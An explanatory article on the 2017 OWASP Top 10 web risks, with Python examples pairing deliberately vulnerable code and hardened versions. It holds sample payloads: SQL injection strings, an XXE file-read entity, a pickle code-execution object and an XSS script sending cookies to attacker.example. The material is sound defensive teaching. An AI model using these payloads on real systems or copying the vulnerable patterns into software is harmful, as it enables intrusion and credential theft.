OWASP, the Open Web Application Security Project (since renamed the Open Worldwide Application Security Project), is an internationally recognized non-profit organization dedicated to improving the security of software, and of web applications in particular. It was founded in 2001. OWASP has one core principle: all of its material is available to the public for free, so that anyone can improve the security of their web applications. OWASP offers forums, extensive documentation, tutorials and videos for beginners and learners. One of its best-known projects is the OWASP Top 10.
What is OWASP Top 10?
The OWASP Top 10 is a regularly updated report that describes the most critical security risks to web applications and lists the ten most important of them. A dedicated team of security experts at OWASP compiles it from vulnerability data contributed by security firms and from an industry survey. The OWASP Top 10 is an "awareness document", not a standard, and a recommendation guide for any company that wants to minimize and mitigate web application security risks.
Security Risks Reported in OWASP Top 10
The following security risks are listed in the 2017 edition of the OWASP Top 10, which is the edition this page covers (the 2021 edition reshuffled the list, for example folding Cross-Site Scripting into Injection and adding Insecure Design and Server-Side Request Forgery):
1. Injection
Injection is listed among the top 10 security risks for web applications. It is a broad category of attacks in which an attacker supplies untrusted or malicious input to a web application in such a way that an interpreter (a SQL database, an operating-system shell, an LDAP directory, an XML, NoSQL or expression-language engine) processes part of that input as a command or query rather than as data. This changes what the interpreter executes and so disrupts the intended flow of the program.
Injection is one of the oldest and most dangerous attacks on web applications. Its consequences include, but are not limited to, data theft, denial of service, loss of data integrity, data manipulation and, in the most severe cases, complete loss of control over the system.
The most common reason these attacks succeed is that user input is not validated, or is validated insufficiently, before it reaches an interpreter. Injection flaws such as SQL injection are not only very dangerous but also very commonly found in legacy applications. (The 2017 edition lists Cross-Site Scripting, which is really injection into HTML, as a separate item, number 7 below.) They are worrying because the attack surface is huge: every place where the application builds a query or command from user-controlled data is a candidate.
These attacks are also very easy to carry out: many free tools are available (sqlmap is the best known for SQL injection) that let even inexperienced attackers exploit injection flaws successfully. The primary defence is to keep data separate from code: use a safe API such as parameterized queries (prepared statements) or an ORM instead of concatenating user input into a query string. Validate input against an allow-list of what the application actually expects, escape special characters for the specific interpreter only where no safe API exists, and run the database account with the least privilege it needs so that a successful injection exposes as little as possible. Application code should never use user input directly as part of a command; "avoiding user input" altogether is not an option for a real application, so the point is to make sure that input can only ever be treated as data.
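The difference between a concatenated query and a parameterized one, as an added example that is not part of the original article. It uses Python's standard-library sqlite3 module against an in-memory database filled with constructed sample rows; the two payloads are the classic tautology and UNION injection strings, and the allow-list regular expression is an assumed policy for this example.

```python
import re
import sqlite3

# Allow-list for usernames; an assumed policy for this example.
USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")


def make_db():
    """In-memory database with constructed sample rows (not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [
            ("alice", "hash-of-alice", "user"),
            ("bob", "hash-of-bob", "user"),
            ("admin", "hash-of-admin", "admin"),
        ],
    )
    return conn


def find_user_vulnerable(conn, username):
    """The flaw: the username becomes part of the SQL text, so quotes and
    keywords inside it change the statement the database executes."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Parameterized query: the SQL text is fixed and the driver passes the
    value separately, so the input can only ever be compared as data."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def find_user_validated(conn, username):
    """Defence in depth: allow-list validation in front of the safe query, so
    obviously hostile input is rejected before it reaches the database."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allow-list")
    return find_user_safe(conn, username)


# Two classic injection payloads (constructed for this example).
TAUTOLOGY = "' OR '1'='1"
UNION_DUMP = "x' UNION SELECT password_hash, role FROM users--"

if __name__ == "__main__":
    db = make_db()
    # Vulnerable: the tautology returns every row, the UNION leaks password hashes.
    print(find_user_vulnerable(db, TAUTOLOGY))
    print(find_user_vulnerable(db, UNION_DUMP))
    # Safe: both payloads are simply usernames that do not exist.
    print(find_user_safe(db, TAUTOLOGY), find_user_safe(db, UNION_DUMP))
```

The vulnerable function turns the tautology into WHERE username = '' OR '1'='1' and returns every row, and the UNION payload turns a username lookup into a dump of password hashes; the parameterized version returns nothing for both, because the driver never lets the value alter the statement. The allow-list is a second layer, not a replacement for parameterization.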
2. Broken Authentication
Broken Authentication covers flaws in the login and session-management system: weak or default passwords, credential stuffing against a login form with no rate limit, session identifiers exposed in URLs, sessions that never expire, and passwords stored in plaintext or with weak hashes. Such flaws can give attackers access to a user's sensitive information and, if an administrator account is taken over, control of the complete system. The risk can be mitigated with multi-factor authentication (one-time passwords or a hardware security key such as a Google Titan or any other FIDO2 key), by checking new passwords against lists of known breached passwords, by limiting or delaying login attempts for an account or source address over a time interval, and by storing passwords only as a slow, salted hash (Argon2, bcrypt, scrypt or PBKDF2).
3. Sensitive Data Exposure
If sensitive data is not protected properly, attackers can obtain information such as passwords, payment card numbers or health records, use it to take over user accounts, or sell it. A common way to steal data in transit is a man-in-the-middle attack against an unencrypted or weakly encrypted connection; data at rest is exposed through databases, backups and logs that store it in clear text. Sensitive Data Exposure can be reduced by not storing data that is not needed, encrypting what is stored, enforcing TLS for all traffic (for example with HTTP Strict Transport Security), disabling caching of responses that contain sensitive information (Cache-Control: no-store), hashing passwords with a dedicated password hash rather than encrypting them, and, for files that must be shared, issuing short-lived signed URLs instead of permanent links.
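An added example, not from the original article, covering both the Broken Authentication and Sensitive Data Exposure points above: passwords are stored only as a salted scrypt hash (Python's standard hashlib), the comparison is constant-time, an unknown username is not distinguishable from a wrong password, and repeated failures lock the account for a window. The AuthService class, its thresholds and the injectable clock are assumptions made for this example; the in-memory dictionaries would be a database in a real application.

```python
import hashlib
import hmac
import os
import time

SALT_LEN = 16


def hash_password(password: str, n: int = 2**14) -> bytes:
    """Slow, salted hash with scrypt from the standard library; returns salt||digest.
    n=2**14 keeps the demo fast; production should use a higher cost or Argon2."""
    salt = os.urandom(SALT_LEN)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=n, r=8, p=1, dklen=32)
    return salt + digest


def verify_password(stored: bytes, password: str, n: int = 2**14) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt, digest = stored[:SALT_LEN], stored[SALT_LEN:]
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=n, r=8, p=1, dklen=32)
    return hmac.compare_digest(candidate, digest)


class AuthService:
    """Login with per-account lockout. The clock is injectable so the lockout can be tested."""

    def __init__(self, max_failures=5, window_seconds=300, clock=time.monotonic, scrypt_n=2**14):
        self.users = {}        # username -> stored salt||digest (never the password itself)
        self.failures = {}     # username -> timestamps of recent failed attempts
        self.max_failures = max_failures
        self.window = window_seconds
        self.clock = clock
        self.n = scrypt_n
        # Verified for unknown usernames so response time does not reveal which accounts exist.
        self.dummy = hash_password("dummy-password", n=scrypt_n)

    def register(self, username: str, password: str) -> None:
        self.users[username] = hash_password(password, n=self.n)

    def _recent_failures(self, username: str) -> list:
        now = self.clock()
        recent = [t for t in self.failures.get(username, []) if now - t < self.window]
        self.failures[username] = recent
        return recent

    def login(self, username: str, password: str) -> str:
        """Returns 'ok', 'locked' or 'invalid'; unknown users get 'invalid', not a distinct error."""
        if len(self._recent_failures(username)) >= self.max_failures:
            return "locked"
        stored = self.users.get(username, self.dummy)
        ok = verify_password(stored, password, n=self.n) and username in self.users
        if ok:
            self.failures.pop(username, None)
            return "ok"
        self.failures.setdefault(username, []).append(self.clock())
        return "invalid"


if __name__ == "__main__":
    svc = AuthService(max_failures=3, window_seconds=60)
    svc.register("alice", "correct horse battery staple")
    print([svc.login("alice", "guess") for _ in range(3)], svc.login("alice", "correct horse battery staple"))
```

Even the correct password is refused while the account is locked, which is what stops online guessing; the lockout expires on its own so the defence does not become a denial-of-service lever against legitimate users. Because only salted scrypt output is stored, a leaked user table does not hand the attacker reusable passwords.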
4. XML External Entities (XXE)
An XXE attack targets a web application that parses XML input (XML, the Extensible Markup Language, is both machine- and human-readable). An XML document may declare an external entity whose content is loaded from a URI, such as a local file (file:///etc/passwd) or a URL on an internal network. If the parser resolves such entities, an attacker who controls the XML can read local files, probe internal systems through the server (server-side request forgery), or cause denial of service through nested entity expansion (the "billion laughs" attack); the file contents come back in the parsed data or in error messages and so reach the attacker directly. Many XML parsers resolve external entities by default. The best way to prevent XXE is to avoid XML input and use a simpler format such as JSON. Where XML is needed, keep the parser patched and, most importantly, disable document type definitions (DTDs) and external entity resolution in the parser configuration.
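As an added example (not from the original article) of the hardening step above, in Python: a loader that refuses any document carrying a DOCTYPE before handing it to xml.etree.ElementTree. Python's bundled expat parser does not fetch external entities itself, but it does expand internal entities, and parsers in other libraries and languages do resolve external ones by default, so rejecting the DTD outright is the simplest reliable rule. The payloads below are constructed for the demonstration and the function names are assumptions.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenDTD(ValueError):
    """Raised when a document declares a DOCTYPE (and therefore may define entities)."""


def reject_dtd(data: bytes) -> None:
    """Pre-scan the document with expat and abort on any DOCTYPE declaration.
    StartDoctypeDeclHandler fires before any entity in the internal subset is
    declared, so neither external entities nor expansion bombs get a chance."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenDTD(f"DOCTYPE '{name}' is not allowed in this input")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


def parse_naive(data: bytes) -> ET.Element:
    """Parses whatever it is given, DTD included."""
    return ET.fromstring(data)


def parse_hardened(data: bytes) -> ET.Element:
    """Same result for plain documents, exception for anything with a DTD."""
    reject_dtd(data)
    return ET.fromstring(data)


def is_accepted(data: bytes) -> bool:
    """True if the hardened loader accepts the document."""
    try:
        parse_hardened(data)
        return True
    except ForbiddenDTD:
        return False


# Constructed inputs for the demonstration.
BENIGN_DOC = b'<?xml version="1.0"?><order><item>widget</item><qty>2</qty></order>'

# Classic XXE payload: an external entity pointing at a local file.
XXE_DOC = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b'<order><item>&xxe;</item></order>'
)

# Miniature "billion laughs": 3 x 4 = 12 characters from a two-level entity chain.
EXPANSION_DOC = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE a [<!ENTITY x "aaaa"><!ENTITY y "&x;&x;&x;">]>'
    b'<a>&y;</a>'
)

if __name__ == "__main__":
    print(parse_naive(EXPANSION_DOC).text)   # the naive parser expands the entities
    print(is_accepted(BENIGN_DOC), is_accepted(XXE_DOC), is_accepted(EXPANSION_DOC))
```

The naive parser returns twelve a's for EXPANSION_DOC, showing that entity expansion is live; with a few more levels that becomes gigabytes of memory from a few hundred bytes of input. The hardened loader rejects both malicious documents at the DOCTYPE and accepts the plain one unchanged. The same idea exists as a switch in most parsers (for example disallow-doctype-decl in Java's XML APIs), and the defusedxml package wraps the Python standard library this way.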
5. Broken Access Control
Access control is the part of a system that decides which users may reach which functionality and data. Broken access control lets an attacker bypass authorization checks and perform tasks as another user, including a privileged user such as an administrator. A typical example is a web application that lets a logged-in user view or change a different account simply by editing an identifier in the URL (for example /account?id=1234), with no check that the user actually owns that account; this is often called an insecure direct object reference. Access control must be enforced on the server side for every request, deny by default, and be based on the authenticated session rather than on values the client can edit; authorization tokens such as session cookies or JWTs must be validated on every request and invalidated on logout, and access-control failures should be logged so that repeated probing can be noticed.
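The URL-editing example above in code, as an added illustration that is not part of the original article: an update that trusts the account id from the request next to one that checks ownership or role on every call, denies by default and records each refusal. The AccountService class, its constructed accounts and roles, and the two-role model are assumptions for this example.

```python
from dataclasses import dataclass


class Forbidden(Exception):
    """Authorization failure; the web layer maps this to HTTP 403 (or 404 to avoid enumeration)."""


@dataclass
class Account:
    id: int
    owner: str
    email: str


class AccountService:
    """Constructed in-memory store standing in for the database in this example."""

    def __init__(self):
        self.accounts = {
            1: Account(1, "alice", "alice@example.com"),
            2: Account(2, "bob", "bob@example.com"),
        }
        self.roles = {"alice": "user", "bob": "user", "carol": "admin"}
        self.audit = []  # access-control failures belong in the security log

    # Vulnerable: the account id comes straight from the URL and is trusted.
    def update_email_vulnerable(self, session_user, account_id, new_email):
        self.accounts[account_id].email = new_email

    # Hardened: every request re-derives what the session user may touch.
    def _deny(self, user, resource, key, reason):
        self.audit.append({"user": user, "resource": resource, "key": key, "reason": reason})
        raise Forbidden(f"{user} may not access {resource} {key}: {reason}")

    def _authorize_account(self, session_user, account_id):
        account = self.accounts.get(account_id)
        if account is None:
            self._deny(session_user, "account", account_id, "no such account")
        if self.roles.get(session_user) == "admin" or account.owner == session_user:
            return account
        self._deny(session_user, "account", account_id, "not owner")

    def update_email_secure(self, session_user, account_id, new_email):
        account = self._authorize_account(session_user, account_id)
        account.email = new_email

    def list_all_accounts(self, session_user):
        """Function-level check for an admin-only operation."""
        if self.roles.get(session_user) != "admin":
            self._deny(session_user, "admin", "list_all_accounts", "role required")
        return sorted(a.id for a in self.accounts.values())


if __name__ == "__main__":
    svc = AccountService()
    svc.update_email_vulnerable("bob", 1, "evil@example.com")   # bob rewrites alice's account
    print(svc.accounts[1].email)
    try:
        svc.update_email_secure("bob", 1, "evil@example.com")
    except Forbidden as exc:
        print("blocked:", exc)
```

The important property is that the decision uses the authenticated session user and the record's own owner field, never a user id or role carried in the request, and that an unknown user or missing role falls through to denial rather than to access.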
6. Security Misconfiguration
Security Misconfiguration is one of the most common vulnerabilities. It is the by-product of running with default configurations (default accounts and passwords, sample applications, directory listing enabled, debug mode left on in production), of leaving unnecessary features, ports or services enabled, and of showing excessively verbose error messages or stack traces to users. The risk can be mitigated with a repeatable, preferably automated hardening process applied identically to development, test and production, by removing unused features and components, by reviewing framework settings and security headers after every upgrade, and by making sure the error messages shown to users are generic while the details go to the server log.
7. Cross-Site Scripting
Cross-Site Scripting, also known as XSS, is a prevalent web security threat and one of attackers' favourite ways to steal personal information. In XSS the attacker does not change your server code; instead, they get the application to include untrusted data (a comment, a profile name, a URL parameter) in a web page without proper escaping, so that a victim's browser interprets that data as script. Whenever another client loads the page, the injected script runs in their browser with the privileges of your site: it can read the session cookie or page contents and send them to the attacker, or perform actions as the user. Three variants are usually distinguished: stored XSS (the payload is saved on the server and served to every visitor), reflected XSS (the payload arrives in a request, for example a search parameter, and is echoed in the response) and DOM-based XSS (client-side JavaScript writes untrusted data into the page). Stored XSS is common on websites that let users share content, such as blogs and forums. The primary defence is context-aware output encoding of all untrusted data (HTML body, attribute, JavaScript and URL contexts each need different escaping), which modern frameworks such as Ruby on Rails and React do by default for ordinary templating. A Content Security Policy limits what an injected script can do, and a Web Application Firewall can block known payloads, but neither should be the only protection.
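As an added example (not from the original article), in Python: the same comment rendered with plain string interpolation, which is a stored XSS flaw, and with context-aware encoding, where element text and attribute values go through html.escape and the link URL is checked against a scheme allow-list so that javascript: URLs cannot slip past the escaping. The render functions, the allow-list and the Content-Security-Policy value are assumptions for this example; a real application gets the same effect from its template engine's auto-escaping.

```python
import html
from urllib.parse import urlsplit

# Limits what an injected script could do if encoding is ever missed (assumed policy).
CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'"


def render_comment_vulnerable(author, body, homepage):
    """Untrusted fields interpolated straight into HTML: stored XSS."""
    return f'<div class="comment"><a href="{homepage}">{author}</a><p>{body}</p></div>'


def safe_href(url):
    """URL context: only absolute http(s) links are allowed; anything else becomes an
    inert '#'. The scheme allow-list is what stops javascript: and data: URLs, which
    html.escape alone would leave fully executable."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_comment_safe(author, body, homepage):
    """Each value encoded for the context it lands in: quoted attribute, element text."""
    return (
        f'<div class="comment"><a href="{safe_href(homepage)}">'
        f'{html.escape(author, quote=True)}</a>'
        f'<p>{html.escape(body, quote=True)}</p></div>'
    )


# Constructed attacker input: a cookie-stealing script and a javascript: link.
PAYLOAD_BODY = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
PAYLOAD_LINK = "javascript:alert(document.cookie)"

if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD_BODY, PAYLOAD_LINK))
    print(render_comment_safe("mallory", PAYLOAD_BODY, PAYLOAD_LINK))
```

In the safe output the script tags survive only as &lt;script&gt; text and the link is neutralised, while an ordinary comment with quotes and ampersands still renders correctly. Note that html.escape covers the HTML body and quoted-attribute contexts only; a value placed inside a script block, an inline event handler or a style rule needs that context's own encoder, and relative links would need their own rule since this allow-list rejects them.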
8. Insecure Deserialization
Insecure Deserialization mainly affects applications that serialize and deserialize objects frequently. Serialization converts an in-memory object into a format for storage or transmission (Java serialization, Python pickle, PHP serialize, .NET BinaryFormatter); deserialization is the reverse. The flaw occurs when an application deserializes data from an untrusted source, such as a cookie, a hidden form field or a message from another service: the attacker can supply an object graph that, when reconstructed, changes the application's logic (for example a serialized user object with its role changed to admin), consumes excessive resources (denial of service) or, most severely, executes arbitrary code, because many serialization formats let the payload decide which classes and methods run during deserialization. The safest strategy is not to deserialize data from untrusted sources at all; where data must round-trip through the client, use a data-only format such as JSON, sign it (for example with an HMAC) so that tampering is detected before the content is parsed, and validate it against a strict schema before use.
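An added example that is not part of the original article, in Python: a pickle payload whose byte stream makes the loader call a function of the attacker's choosing (a harmless os.path.join here, standing in for os.system or any other importable callable), next to the recommended alternative, a JSON body carried with an HMAC tag that is verified before the body is parsed and then checked against a fixed schema. The key, the session schema and the helper names are assumptions for this example.

```python
import base64
import hashlib
import hmac
import json
import os
import pickle


class BadToken(ValueError):
    """Signature, encoding or schema check failed; the body was never interpreted."""


# The problem with a native object format
class Malicious:
    """Constructed object whose pickle stream tells the loader to call
    os.path.join("pwned", "by", "pickle"). Any importable callable could be named
    here instead: the payload, not the application, chooses the code that runs."""

    def __reduce__(self):
        return (os.path.join, ("pwned", "by", "pickle"))


def build_pickle_payload() -> bytes:
    return pickle.dumps(Malicious())


def load_session_pickle(blob: bytes):
    """The flaw: pickle.loads executes whatever callable the bytes reference."""
    return pickle.loads(blob)


# Data-only format, integrity-protected, validated before use
SESSION_KEYS = {"user", "role"}   # assumed schema for this example


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text.encode("ascii"))


def sign_session(data: dict, key: bytes) -> str:
    body = json.dumps(data, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return _b64e(body) + "." + _b64e(tag)


def load_session_signed(token: str, key: bytes) -> dict:
    try:
        body_b64, tag_b64 = token.split(".", 1)
        body, tag = _b64d(body_b64), _b64d(tag_b64)
    except ValueError as exc:            # wrong shape or invalid base64
        raise BadToken("malformed token") from exc
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise BadToken("signature mismatch")   # rejected before json.loads sees the body
    data = json.loads(body)
    if (not isinstance(data, dict) or set(data) != SESSION_KEYS
            or not all(isinstance(v, str) for v in data.values())):
        raise BadToken("unexpected schema")
    return data


def forge_role(token: str, new_role: str) -> str:
    """Attacker's attempt: rewrite the body but keep the original tag."""
    body_b64, tag_b64 = token.split(".", 1)
    data = json.loads(_b64d(body_b64))
    data["role"] = new_role
    body = json.dumps(data, sort_keys=True, separators=(",", ":")).encode()
    return _b64e(body) + "." + tag_b64


if __name__ == "__main__":
    print(load_session_pickle(build_pickle_payload()))   # attacker-chosen call ran
    key = os.urandom(32)
    token = sign_session({"user": "alice", "role": "user"}, key)
    print(load_session_signed(token, key))
    try:
        load_session_signed(forge_role(token, "admin"), key)
    except BadToken as exc:
        print("rejected:", exc)
```

The order of checks matters: the signature is verified over the raw bytes first, so malformed or hostile JSON from an attacker is never parsed, and the schema check afterwards stops a validly signed but unexpected structure from reaching application logic. JSON can only produce dicts, lists, strings and numbers, never a callable, which is what makes it a safe carrier where pickle is not.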
9. Using Components With Known Vulnerabilities
One of the most common risks to web application security is that developers use components (libraries, frameworks and other software modules) with known vulnerabilities, and these components run with the same privileges as the application itself. A published vulnerability with a public exploit makes compromise far easier. To minimize the risk, developers should keep an inventory of the components they use and of those components' own dependencies, subscribe to security advisories for them, scan regularly with a software composition analysis tool such as OWASP Dependency-Check, npm audit or pip-audit, and upgrade or remove any framework or library with known vulnerabilities.
10. Insufficient Logging And Monitoring
Insufficient Logging and Monitoring is also one of the major contributors to web application insecurity. To date, many web applications are poorly monitored and logged, so breaches go undetected. Most breach studies put the average time to detect a breach at around 200 days, and it is usually an external party rather than internal monitoring that discovers it. This gives attackers plenty of time to misuse the data or to move further into the network. OWASP recommends that developers log login attempts, access-control failures and server-side input validation failures with enough context (user, source address, time) to identify suspicious accounts, that logs be written in a format a centralized log-management system can consume and retained long enough for delayed forensic analysis, and that alerting and an incident response plan be in place so that suspicious activity is detected and acted on in near real time.
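As an added example (not from the original article): login events written as structured JSON lines with the context OWASP asks for, and a small detector run over a constructed sample log that flags one source address failing against many different accounts inside a short window, the signature of credential stuffing. The log format, the threshold values and the sample addresses (from the RFC 5737 documentation ranges) are assumptions for this example.

```python
import json
from collections import defaultdict, deque
from datetime import datetime


def auth_event(ts: str, event: str, user: str, src_ip: str, outcome: str, reason: str = "") -> str:
    """One structured log line. Log the reason for a failure, never the password tried."""
    rec = {"ts": ts, "event": event, "user": user, "src_ip": src_ip, "outcome": outcome}
    if reason:
        rec["reason"] = reason
    return json.dumps(rec, sort_keys=True)


def _epoch(ts: str) -> float:
    return datetime.fromisoformat(ts.replace("Z", "+00:00")).timestamp()


def detect_credential_stuffing(lines, threshold=5, window_seconds=60, min_accounts=3):
    """Flag a source address that accumulates `threshold` login failures against at
    least `min_accounts` distinct accounts inside a sliding window of `window_seconds`.
    A single user mistyping their own password several times does not trip it."""
    recent = defaultdict(deque)      # src_ip -> deque of (epoch seconds, user)
    alerts = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("event") != "login" or rec.get("outcome") != "failure":
            continue
        now = _epoch(rec["ts"])
        q = recent[rec["src_ip"]]
        q.append((now, rec["user"]))
        while q and now - q[0][0] > window_seconds:   # drop failures outside the window
            q.popleft()
        accounts = {u for _, u in q}
        if len(q) >= threshold and len(accounts) >= min_accounts:
            alerts.append({"src_ip": rec["src_ip"], "failures": len(q),
                           "accounts": sorted(accounts), "last_seen": rec["ts"]})
            q.clear()                                 # one alert per burst
    return alerts


# Constructed sample log: a legitimate user mistyping once, then a spray from one address.
SAMPLE_LOG = [
    auth_event("2024-05-01T12:00:00Z", "login", "alice", "198.51.100.5", "failure", "bad password"),
    auth_event("2024-05-01T12:00:04Z", "login", "alice", "198.51.100.5", "success"),
    auth_event("2024-05-01T12:01:00Z", "login", "alice", "203.0.113.7", "failure", "bad password"),
    auth_event("2024-05-01T12:01:03Z", "login", "bob", "203.0.113.7", "failure", "bad password"),
    auth_event("2024-05-01T12:01:05Z", "login", "carol", "203.0.113.7", "failure", "bad password"),
    auth_event("2024-05-01T12:01:08Z", "login", "dave", "203.0.113.7", "failure", "bad password"),
    auth_event("2024-05-01T12:01:12Z", "login", "erin", "203.0.113.7", "failure", "bad password"),
    auth_event("2024-05-01T12:01:15Z", "login", "frank", "203.0.113.7", "failure", "no such user"),
]

if __name__ == "__main__":
    for alert in detect_credential_stuffing(SAMPLE_LOG):
        print(alert)
```

The detector can only work because each line carries the source address, the account and a timestamp; a log that records only "login failed" gives an analyst nothing to pivot on. In production the same logic runs in the SIEM over the centralized log stream, and the alert feeds the incident response plan rather than a print statement.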